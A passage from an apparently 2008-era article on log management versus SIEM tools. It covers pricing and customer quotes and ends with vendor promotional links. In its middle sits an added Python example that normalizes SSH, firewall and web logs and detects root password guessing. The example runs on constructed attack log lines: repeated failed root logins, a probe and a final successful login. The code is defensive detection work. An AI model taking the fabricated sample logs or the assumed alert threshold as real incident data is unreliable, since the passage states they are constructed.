They diverge somewhat in purpose and architecture. Log management tools address many key policy and compliance needs. Without them, the pain points are excruciating: Your IT and security folks have to review logs for each system and application separately, and connecting the dots between systems is pretty hopeless. Central storage is a major headache. Monitoring for security
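The collect-aggregate-normalize-query pipeline described above, and the root password guessing detection from Scenario 6 of the previous article, as one added example written for this page (not code from the article, SenSage, LogLogic or any other vendor named here). Three raw formats, an sshd syslog line, an iptables LOG line and an Apache combined access log line, are mapped onto a single schema; one query then pulls everything a given source address did across the firewall, the SSH host and the web server (the "connecting the dots" that per-system review cannot do), and the Scenario 6 detection runs over the normalized login events. The Event fields, the regular expressions, the year supplied for syslog timestamps, the assumption that all sources log in one time zone, the host tag given to web events, the alert threshold, and every sample line except the article's "Accepted password for root" line are assumptions or constructed data.

```python
# Added example: normalize three log formats into one schema, query across them,
# and run the Scenario 6 detection. Schema, regexes, thresholds and all sample
# lines except the article's "Accepted password" line are assumed/constructed.
import re
from collections import Counter, defaultdict
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional


@dataclass
class Event:
    """Common record every source is normalized into (assumed schema)."""
    ts: datetime
    source: str          # sshd | firewall | web
    host: str
    src_ip: str
    user: Optional[str]
    action: str          # login:<method> | connection:<proto>/<port> | request:<method> <path>
    outcome: str         # success | failure | drop | accept | HTTP status
    raw: str


SYSLOG_HDR = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) (?P<host>\S+) "
SSHD_RE = re.compile(SYSLOG_HDR + r"sshd\[\d+\]: (?P<outcome>Accepted|Failed) (?P<method>\w+) for "
                     r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$")
FW_RE = re.compile(SYSLOG_HDR + r"kernel: (?:\[[\d. ]+\] )?(?P<prefix>[\w-]+): (?P<kv>.*)$")
WEB_RE = re.compile(r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')


def _syslog_ts(text: str, year: int) -> datetime:
    # syslog carries no year; the collector supplies it (2008 assumed, matching the article's line)
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")


def _strip_mapped(ip: str) -> str:
    # "::ffff:1.2.3.4" is the IPv4-mapped form sshd logs on dual-stack hosts, as in the article
    return ip[7:] if ip.startswith("::ffff:") else ip


def normalize(line: str, year: int = 2008, web_host: str = "www1") -> Optional[Event]:
    """Map one raw line from any of the three formats onto Event; None if unrecognized."""
    m = SSHD_RE.match(line)
    if m:
        return Event(_syslog_ts(m["ts"], year), "sshd", m["host"], _strip_mapped(m["ip"]), m["user"],
                     f"login:{m['method']}", "success" if m["outcome"] == "Accepted" else "failure", line)
    m = FW_RE.match(line)
    if m:
        kv = dict(tok.split("=", 1) for tok in m["kv"].split() if "=" in tok)  # flags like SYN/DF carry no '='
        return Event(_syslog_ts(m["ts"], year), "firewall", m["host"], kv.get("SRC", ""), None,
                     f"connection:{kv.get('PROTO', '?').lower()}/{kv.get('DPT', '?')}",
                     m["prefix"].split("-")[-1].lower(), line)  # --log-prefix "FW-DROP: " -> "drop"
    m = WEB_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)  # one zone assumed
        return Event(ts, "web", web_host, m["ip"], None if m["user"] == "-" else m["user"],
                     f"request:{m['method']} {m['path']}", m["status"], line)
    return None


def count_by(events: List[Event], field: str) -> dict:
    return dict(Counter(getattr(e, field) for e in events))


def events_for_ip(events: List[Event], ip: str) -> List[Event]:
    """The cross-source query: everything one address did, oldest first."""
    return sorted((e for e in events if e.src_ip == ip), key=lambda e: e.ts)


def timeline(events: List[Event], ip: str) -> List[str]:
    return [f"{e.ts:%b %d %H:%M:%S} {e.source:8} {e.host:7} {e.action} {e.outcome}"
            + (f" user={e.user}" if e.user else "") for e in events_for_ip(events, ip)]


def detect_password_guessing(events: List[Event], fail_threshold: int = 20) -> list:
    """Scenario 6 over normalized login events: alert when one source reaches
    fail_threshold failures, and again when a source that has failed then succeeds."""
    failures = defaultdict(int)
    alerts = []
    for e in sorted((x for x in events if x.action.startswith("login:")), key=lambda x: x.ts):
        if e.outcome == "failure":
            failures[e.src_ip] += 1
            if failures[e.src_ip] == fail_threshold:
                alerts.append(("BRUTE_FORCE", e.src_ip, e.user, failures[e.src_ip]))
        elif failures[e.src_ip]:
            alerts.append(("SUCCESS_AFTER_FAILURES", e.src_ip, e.user, failures[e.src_ip]))
    return alerts


ATTACKER = "216.167.115.236"  # the address in the article's sshd line
SAMPLE_LINES = [
    # constructed: the firewall drops a telnet probe, then allows the SSH connection
    f"Apr 22 02:59:58 fw1 kernel: [12345.678] FW-DROP: IN=eth0 OUT= SRC={ATTACKER} DST=192.0.2.10 LEN=60 TTL=54 DF PROTO=TCP SPT=43110 DPT=23 SYN URGP=0",
    f"Apr 22 02:59:59 fw1 kernel: [12346.101] FW-ACCEPT: IN=eth0 OUT=eth1 SRC={ATTACKER} DST=192.0.2.10 LEN=60 TTL=54 DF PROTO=TCP SPT=43111 DPT=22 SYN URGP=0",
    # constructed: 25 guesses standing in for the thousands the article describes
    *[f"Apr 22 03:{i // 10:02d}:{(i % 10) * 5:02d} support sshd[{1800 + i}]: Failed password for root from ::ffff:{ATTACKER} port {16000 + i} ssh2"
      for i in range(25)],
    # constructed: web server traffic, one request from the same address, plus a legitimate user
    f'{ATTACKER} - - [23/Apr/2008:11:40:07 -0500] "GET /admin/ HTTP/1.1" 404 512 "-" "curl/7.18.0"',
    '10.0.0.5 - alice [23/Apr/2008:11:41:30 -0500] "POST /login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    "Apr 23 11:42:01 support sshd[2100]: Accepted publickey for alice from 10.0.0.5 port 51234 ssh2",
    # the line quoted in the article, then a pam line this normalizer does not handle
    f"Apr 24 15:09:02 support sshd[2396]: Accepted password for root from ::ffff:{ATTACKER} port 17001 ssh2",
    "Apr 24 15:09:02 support sshd[2396]: pam_unix(sshd:session): session opened for user root by (uid=0)",
]

if __name__ == "__main__":
    evs = [e for e in (normalize(l) for l in SAMPLE_LINES) if e]
    print("\n".join(timeline(evs, ATTACKER)))
    print(detect_password_guessing(evs))
```

The point of the shared schema is the last two calls: once every source agrees on what a timestamp, a source address and an outcome are, "what did this address do" is one query rather than three grep sessions, and the Scenario 6 rule reads login events without caring which product wrote them.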
Price, of course, is key to the large enterprise/small business dichotomy when it comes to SIEM versus log management. Typical SIEM sales easily pass the $100,000 threshold, and go well into seven figures for larger organizations. Log management products more typically will cost maybe $10,000 to $20,000, though large deployments can run up into the hundreds of thousands.

Matt White, for example, said the initial budget of $100,000 for SenSage's log management product at his large retail company was way off the mark as they started to get RFP responses. He quickly got an increase to $350,000 for the IT infrastructure portion of the implementation. SIEM tools either couldn't meet his reporting requirements or priced themselves out of the running. One SIEM vendor quoted $1.7 million, another $2.7 million. "It was crazy," he said.

"We were hearing a lot from the customers we weren't getting, because our solution was way overkill for what they were looking for," said Tracey Hulver, executive VP for product marketing and management for NetForensics, which has a logging product to complement its SIEM offering. "A lot of companies only have $20,000-$30,000 to spend and don't want to hear about real-time threats because either you are dealing with the auditor directly or someone on the compliance side, or the tech guy you are dealing with is getting beaten up by the auditor. That's what they are trying to solve."

While regulatory compliance is mandatory, and security is always tough to justify from a cost perspective, there are a number of use cases that make the ROI easier.

"The driver for logging is compliance, 100 percent," said General Dynamics' Garner, "but you get buy-in across the enterprise from business owners, network support teams and security teams for the value the logging data gives them."

Automated products can be invaluable for mining business data and enabling network operations teams and help desks to quickly identify and remediate problems, saving man hours and money.

Managed services, which are finding their way into every security market, are a relatively inexpensive option. Providers can typically offer log collection and forensics, as well as monitoring. They can handle the storage/retention requirements, depending on the organization's willingness to allow the data off-site.
MARKETPLACE

This market features a number of SIEM vendors, some of which have introduced their own log management products, in addition to pure-play log management vendors.* In addition, many managed service providers, such as SecureWorks, Savvis, BT and Verizon Business, offer services based on some of these products.

LogLogic
    The Essentials Series: PCI Compliance.
    Simplifying Global Log Management at Rockwell Automation: Case study on simplifying log management at Rockwell Automation.
    Weekly Live Product Demo on Log Management: Join our product team every Tuesday for a live demo and Q & A of LogLogic.
    The SANS 2008 Log Management Market Report: The SANS Institute 2008 survey on Log Management.

LogRhythm
    Simplifying Log Collection, Storage and Analysis: Capture and analyze all log data in a compressed, cost-effective and self-managing log repository.
    Learn how LogRhythm can help automate compliance for PCI-DSS, HIPAA, SOX, GLBA, NERC-CIP.
    Schedule a 30 minute demonstration with a LogRhythm expert.
    See the 4 minute LogRhythm overview and high level product demonstration.

Splunk
    Splunk > The IT Search Engine: Learn how you can use the Splunk IT Search Engine for Security and Compliance.